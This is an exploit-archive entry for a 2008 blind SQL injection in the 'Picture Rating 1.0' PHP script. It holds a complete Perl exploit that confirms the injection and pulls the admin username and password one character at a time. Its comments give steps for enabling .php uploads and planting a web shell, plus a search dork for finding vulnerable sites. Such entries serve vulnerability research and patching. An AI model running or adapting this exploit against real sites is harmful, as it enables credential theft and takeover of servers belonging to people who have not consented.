Picture Rating 1.0 Blind SQL Injection Exploit

vendor:

Picture Rating 1.0

by:

t0pP8uZz

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Picture Rating 1.0

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Picture Rating 1.0 Blind SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the target host running the Picture Rating 1.0 script. After running the exploit, the attacker will gain access to the admin details, allowing them to log in to the admin area. From there, they can upload a shell, edit settings to allow PHP extensions, and upload a shell. By navigating to the uploaded shell's link, the attacker gains control.

Mitigation:

The vendor was not notified about this vulnerability. Users should consider upgrading to a newer, more secure version of the software or finding an alternative solution.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

# -Info/Instructions-
# After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/
# ok once you have logged in has admin you can upload a shell, click "edit settings" and under the allowed extensions, add ".php" ok now
# register as a normal user or backup the database and get a existing users and login to the main site and navigate to upload image/photo and choose your shell and click upload
# the shell should successfully upload and now you will see a broken image, right click the broken image icon and get the link, navigate to this link in your browser and thats your shell ;)


# Vendor Not Notified
# Discovered By: t0pP8uZz
# Discovered On: 6 April 2008
# greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!

# inurl:"index.php?cmd=" Latest Pictures hot 

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

use strict;
use LWP::Simple;

print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n";
print "-  Discovered && Coded By: t0pP8uZz                                -\n";
print "-                                  Discovered On: 6 April 2008     -\n";
print "-                                                                  -\n";
print "-   This exploit will perform a automated BLIND SQL attack on ..   -\n";
print "-   .. the target host which is running the script.                -\n";
print "--------------------------------------------------------------------\n";

print "\nEnter URL (ie: http://site.com/): ";
	chomp(my $url=<STDIN>);
	
if(inject_test($url)) {
	print "Injecting.. Please Wait this could take several minutes..\n\n";
	my $details = blind($url);
	print "Exploit Success! Admin Details: ".$details;
	exit;
}

sub blind {

	my $url    = shift;
	my $res    = undef;
	my $chr    = 48;
	my $substr = 1;
	my $done   = 1;
	
	while($done) {
		my $content = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*");
		
		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url     = shift;
	my $true    = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=1");
	my $false   = get($url."/index.php?cmd=11&listpics=Y&age1=13&age2=99 and 1=2");
	
	if($true =~ /Previous/ && $false !~ /Previous/) {
		print "\nTarget Site Vulnerable!\n\n";
		return 1;
	} else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; }
}

# milw0rm.com [2008-04-05]